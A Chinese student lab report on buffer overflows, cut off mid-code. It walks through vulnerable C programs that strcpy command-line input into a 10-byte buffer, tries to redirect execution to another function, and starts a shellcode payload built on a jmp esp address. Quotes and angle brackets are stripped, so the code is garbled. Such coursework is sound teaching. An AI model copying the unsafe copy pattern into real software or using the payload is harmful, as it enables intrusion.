安全程序设计的实验报告.docVIP

实验报告 课程名称： 学 院： 姓 名： 班 级： 学 号： 年 月 日 实验一：缓冲区溢出安全问题 一：什么是缓冲区溢出： 缓冲区溢出是指当计算机向缓冲区内填充数据时超过了缓冲区本身的容量而溢出；某些情况下，溢出的数据只是覆盖在一些不重要的的内存空间上，不会产生严重后果；但是一旦溢出的数据覆盖在合法数据上，可能会给系统带来巨大的危害。 实验程序：运行调试缓冲区溢出P02_03.C，P02_04.C，P02_05.C，P02_06.C 二：实验步骤： 1：打开microsoft visual studio 6.0 选择microsoft visual c++ File-new –projects –win32 console application（项目名称P0203） File-new-files - c++ source file 编辑程序： #includestdio.h #includestring.h void function(char *input) { char buffer[10]; strcpy(buffer,input); printf(Call fun1,buffer= %s\n,buffer); } int main(int argc,char *argv[]) { function(argv[1]); return 0; } Build –compile p0203.cpp- build p02.exe 查找到工程所在地址例如D:\p02.exe 2：开始-运行-cmd-输入D:（进入D盘）-输入CD P02\Debug（进入生成exe所在文件） 输入“P02 security”会显示： 输入“p02 abcdefghijklmnopqrstuvwxyz1234567890” 弹出应用程序错误警示框，提示为 3：将代码修改为： #includestdio.h #includestring.h void fun1(char *input) { char buffer[10]; strcpy(buffer,input); printf(Call fun1,buffer= %s\n,buffer); } void fun2() { printf(call fun2); } int main(int argc,char *argv[]) { printf(Address of fun2= %p\n,fun2); fun1(argv[1]); return 0; } 输入“p02 abcde”显示： 输入“p02 abcdefghijklmnopqrstuvwxyz1234567890” 弹出应用程序错误警示框，提示为 4：代码修改为： #includestdio.h #includestring.h void fun1(char *input) { char buffer[10]; strcpy(buffer,input); printf(Call fun1,buffer= %s\n,buffer); } void fun2() { printf(call fun2); } int main(int argc,char *argv[]) { printf(Address of fun2= %p\n,fun2); fun1(abcdefghijklmnopqrstuvwxyz12\x05\x10\x40); return 0; } 直接调用程序，无法像书中所说可以调用fun2函数，因为找不到下一个buffer区的入口 5：指令通用跳转地址为0x7ffa4512 #includestdio.h #includestring.h void fun1(char *input) { char buffer[10]; strcpy(buffer,input); printf(Call fun1,buffer=%s\n,buffer); } int main(int argc,char *argv[]) { char buffer[]=abcdefghijklmnopqrstuvwxzy12\x12\x45\xfa\x7f \x55\x8B\xEC\x33\xC0\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\